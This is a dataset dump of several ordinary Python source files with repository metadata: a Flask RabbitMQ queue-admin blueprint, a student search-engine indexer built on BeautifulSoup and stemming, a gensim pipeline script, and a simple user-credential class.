|
cebc0b59e26dc564de8eade8510b1d7cd01cd46a
|
/bspider/master/controller/rabbitmq.py
|
d0cbcbfbc3221e15006b6946d16b74a3335d8272
|
[
"BSD-3-Clause"
] |
permissive
|
littlebai3618/bspider
|
0f18548ef66fbb06a8a95cbcfdaf05db5990c7d1
|
ff4d003cd0825247db4efe62db95f9245c0a303c
|
refs/heads/master
| 2023-04-26T14:47:43.228774
| 2021-05-13T02:58:35
| 2021-05-13T02:58:35
| 255,865,935
| 2
| 0
|
BSD-3-Clause
| 2021-05-12T02:11:18
| 2020-04-15T09:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 660
|
py
|
from flask import Blueprint
from bspider.core.api import auth
from bspider.master.service.rabbitmq import RabbitMQService
rabbitmq = Blueprint('rabbitmq_bp', __name__)
rabbitmq_service = RabbitMQService()
@rabbitmq.route('/project/<int:project_id>', methods=['GET'])
@auth.login_required
def project_queue_info(project_id):
"""project相关队列的详细信息"""
return rabbitmq_service.get_project_queue_info(project_id)
@rabbitmq.route('/project/purge/<int:project_id>', methods=['DELETE'])
@auth.login_required
def purge_project_queue(project_id):
"""清空待下载链接"""
return rabbitmq_service.purge_project_queue(project_id)
|
[
"baishanglin@renrenche.com"
] |
baishanglin@renrenche.com
|
004e7568fbdb3e5a639501d4dd91b45601254179
|
702f403e33c94b32bd95e9284349e3c5aa751361
|
/TextAcquisition.py
|
6823d079b79c833821e7b6ae76b37cacd842ea56
|
[] |
no_license
|
Timmichi/ICSearch-Engine
|
71bcc0cefe24afe974ca13f8a6ee15d254776c43
|
471f3b9cd83fbfe2686037f285cdfb787e003146
|
refs/heads/main
| 2023-03-27T01:30:04.997265
| 2021-03-24T22:07:05
| 2021-03-24T22:07:05
| 351,213,421
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,935
|
py
|
import json
import re
from bs4 import BeautifulSoup
import os
import sys
import math
from nltk.stem import PorterStemmer
# Index = Token : [(DocID, ((SearchWord*Priority)+(SearchWord*BasicWords)), [Positions in the text])]
# DocID = DocID : URL
# IndexMarkers = InitialLetter : (StartPosition,EndPosition)
# DocIDMarkers = lineNumber : (StartPosition,EndPosition)
def tokenize(token):
tokens = []
try:
ps = PorterStemmer()
tokens += [ps.stem(token.lower())
for token in re.findall('[a-zA-Z0-9]+', token)]
return tokens
except:
print("ERROR: Tokenize Function Error")
return tokens
def computeWordData(tokens):
if not isinstance(tokens, list):
return {}
freq = {}
positions = {}
for i, t in enumerate(tokens):
if t in freq.keys():
freq[t] += 1
positions[t].append(i)
else:
freq[t] = 1
positions[t] = [i]
return freq, positions
def updateIndex(index, tokenFrequency, totalPositions, importantFrequency, totalWordsInDoc, docID):
for k, v in tokenFrequency.items():
# calculate tf score
tf = v
if tf > 0 and k in importantFrequency:
tf = 2 + math.log10(tf) + math.log(importantFrequency[k])
elif tf > 0 and k not in importantFrequency:
tf = 1 + math.log10(tf)
# add tf score and DocID to posting
if k in index.keys():
index[k].append((docID, tf))
else:
index[k] = [(docID, tf)]
return index
def writeIndex(index):
for k, v in index.items():
directory = ".\letters"
fileName = k + ".txt"
filePath = os.path.join(directory, fileName)
if not os.path.exists(filePath):
f = open(filePath, "w", encoding='utf-8')
for key, value in sorted(v.items(), key=lambda posting: len(posting[1]), reverse=True):
f.write(f"{key} {str(value)}\n")
f.close()
continue
storedData = {}
f = open(filePath, "r", encoding='utf-8')
for txt in f:
val = re.search("^([a-zA-Z0-9]+) (.+)", txt)
token = val.group(1)
posting = eval(val.group(2))
storedData[token] = posting
f.close()
f = open(filePath, "w", encoding='utf-8')
for token, posting in v.items():
if token in storedData:
storedData[token] = storedData[token] + posting
else:
storedData[token] = posting
sortedTuple = sorted(storedData.items(),
key=lambda posting: len(posting[1]), reverse=True)
for k, v in sortedTuple:
f.write(f"{k} {str(v)}\n")
f.close()
def writeDocID(docID, IDline):
for k, v in docID.items():
directory = "." + "\\" + "numbers"
fileName = str(IDline) + ".txt"
filePath = os.path.join(directory, fileName)
f = open(filePath, "a", encoding='utf-8')
f.write(f"{k} {v}\n")
f.close()
def mwMarkers(marker, directory, mergeFile):
endPos = 0
for root, dirs, files in os.walk(directory, topdown=False):
for file in files:
filePath = os.path.join(directory, file)
k = file[0:-4]
with open(filePath, "r", encoding='utf-8', errors='ignore') as f, open(mergeFile, "a", encoding='utf-8') as f2:
for line in f:
f2.write(line)
f2.close()
startPos = endPos
f.seek(0, 2)
endPos = f.tell() + startPos
f.close()
v = (startPos, endPos)
marker[k] = v
def convertIndexToAlphaIndex(index):
alphaIndex = {}
for k, v in index.items():
key = k[0]
if key in alphaIndex.keys():
alphaIndex[key][k] = v
else:
alphaIndex[key] = {}
alphaIndex[key][k] = v
return alphaIndex
def getTitleParagraph(soup):
title = soup.find('title')
if title:
title = soup.find('title').getText()
paragraph = soup.findAll('p')
if paragraph:
preParagraph = soup.findAll('p')
paragraph = ''
for p in preParagraph:
for x in p.findAll(text=True):
paragraph += x
else:
paragraph = soup.getText()
paragraph = re.findall("[A-Z].*?[\.!?,]", paragraph,
re.MULTILINE | re.DOTALL)
if title == None and paragraph:
title = ''
if len(paragraph) < 2:
loop = len(paragraph)
else:
loop = 2
for i in range(0, loop):
title += paragraph[i]
if title and len(title) > 65:
l = title.split(" ")
title = ''
if len(l) < 5:
loop = len(l)
else:
loop = 5
for i in range(0, loop):
title += ' ' + l[i]
title += '...'
if paragraph:
tempParagraph = ''
if len(paragraph) < 5:
loop = len(paragraph)
else:
loop = 5
for i in range(0, loop):
tempParagraph += paragraph[i]
paragraph = tempParagraph[0:250] + "..."
return title, paragraph
def getCondensedUrl(preUrl):
preUrl = preUrl.split("//")
preUrl = preUrl[1]
preUrl = preUrl.split("/")
url = f'{preUrl[0]}'
preUrl.pop(0)
iters = 0
while len(url) < 25 and iters < len(preUrl):
segment = preUrl[iters]
if len(segment) > 10:
url += " > " + segment[0:10] + "..."
else:
url += " > " + segment
iters += 1
return url
filePaths = list()
index = dict()
docID = dict()
for root, dirs, files in os.walk(".\DEV", topdown=False):
for name in files:
filePaths.append(os.path.join(root, name))
fileNumber = 1
initIDLine = 1
currIDLine = initIDLine
total = len(filePaths)
count = 0
for filePath in filePaths:
try:
with open(filePath) as f:
data = json.load(f)
soup = BeautifulSoup(data["content"], "html.parser")
# computes frequency of tokens that are "important"
importantList = ["strong", "h1", "h2", "h3", "title", "b"]
importantText = [words.text.strip()
for words in soup.findAll(importantList)]
importantText = ' '.join([elem for elem in importantText])
importantToken = tokenize(importantText)
importantFrequency = computeWordData(importantToken)[0]
url = data["url"]
con = getCondensedUrl(url)
title, paragraph = getTitleParagraph(soup)
docID[fileNumber] = [url, con, title, paragraph]
text = soup.getText()
fileToken = tokenize(text)
totalWordsInDoc = len(fileToken)
tokenFrequency, totalPositions = computeWordData(fileToken)
updateIndex(index, tokenFrequency, totalPositions,
importantFrequency, totalWordsInDoc, fileNumber)
print(int(float(fileNumber)*100/float(total)), "%")
fileNumber += 1
count += 1
currIDLine += 1
# At 1000 iterations, store index/docID, clear index/docID and reset count
if count == 1000:
# key is sorted by alphanumeric characters, values are the postings for tokens that start with those characters
aIndex = convertIndexToAlphaIndex(index)
writeIndex(aIndex)
writeDocID(docID, initIDLine)
count = 0
initIDLine = currIDLine
docID.clear()
index.clear()
aIndex.clear()
except:
print("Error: Error opening JSON file and using BeautifulSoup")
break
# writes remaining index (iteration that didn't make it to 1000)
if index:
aIndex = convertIndexToAlphaIndex(index)
writeIndex(aIndex)
writeDocID(docID, initIDLine)
docID.clear()
index.clear()
aIndex.clear()
print(len(filePaths))
print(len(index))
print(sys.getsizeof(index))
# creates indexMarker.txt and merges index files in index.txt
indexMarker = dict()
indexDirectory = ".\letters"
mergedIndexFile = "index.txt"
mwMarkers(indexMarker, indexDirectory, mergedIndexFile)
# creates docIDMarker.txt and merges docID files in docID.txt
docIDMarker = dict()
docIDDirectory = "." + "\\" + "numbers"
mergedDocIDFile = "docID.txt"
mwMarkers(docIDMarker, docIDDirectory, mergedDocIDFile)
# writes markers to files
f = open("indexMarkers.txt", "w", encoding='utf-8')
f2 = open("docIDMarkers.txt", "w", encoding='utf-8')
f.write(str(indexMarker))
f2.write(str(docIDMarker))
|
[
"noreply@github.com"
] |
Timmichi.noreply@github.com
|
85190e278f5252ba76b1a7efadbcd85d7aafd277
|
cdf782224f9b74cf8acce919406d03791254fd3c
|
/assignment3/main.py
|
c17bd67d590ec107763c46e32b476e5acfcc9709
|
[] |
no_license
|
tollefj/information-retrieval
|
1bcc46e9fcc15c74ee8dccb31a015935d7e850a7
|
43535384ace262d0b293c26d249b11622f18e470
|
refs/heads/master
| 2022-07-14T22:11:06.716504
| 2017-10-28T17:10:39
| 2017-10-28T17:10:39
| 106,025,641
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
from _gensim import GenSim
if __name__ == '__main__':
gs = GenSim()
gs.read_stopwords()
gs.load()
gs.build_dictionary()
gs.build_bag()
gs.build_tfidf_model()
gs.build_lsi_model()
|
[
"tollefj@gmail.com"
] |
tollefj@gmail.com
|
52d3a05067138b36faf6b476467edbebd184d716
|
622bd4fb4cb50361a5e887544d92a04debb0dd2b
|
/databus/client/user.py
|
230a222d78e3993622a008dc484972f4a37cea4f
|
[
"Apache-2.0"
] |
permissive
|
tedrepo/databus
|
aec06bd28f761ca4beff290fc856e93dd2948c07
|
0f1f290c1b061175a652c3f72efc0d091a5e08c9
|
refs/heads/master
| 2022-12-01T03:10:15.182783
| 2020-08-08T18:40:54
| 2020-08-08T18:40:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,129
|
py
|
""" Module for web users """
import uuid
class Credential: # pylint: disable=R0903
""" Class defining a user credential """
def __init__(self, username: str = "Guest", password: str = "", token: str = ""):
self.username = username
self.password = password
self.token = token
def generate_token(self):
""" Generates and assigns a new token """
self.token = str(uuid.uuid1())
class User: # pylint: disable=R0903
""" Class defining a web user """
def __init__(self, credential: Credential = None):
if credential is None:
self.credential = Credential()
else:
self.credential = credential
def authenticate(self, credential: Credential) -> bool:
""" Checks if the user & password matches """
if credential.username != self.credential.username:
return False
if credential.password != "" and credential.password == self.credential.password:
return True
if credential.token != "" and credential.token == self.credential.token:
return True
return False
|
[
"kerem@koseoglu.info"
] |
kerem@koseoglu.info
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.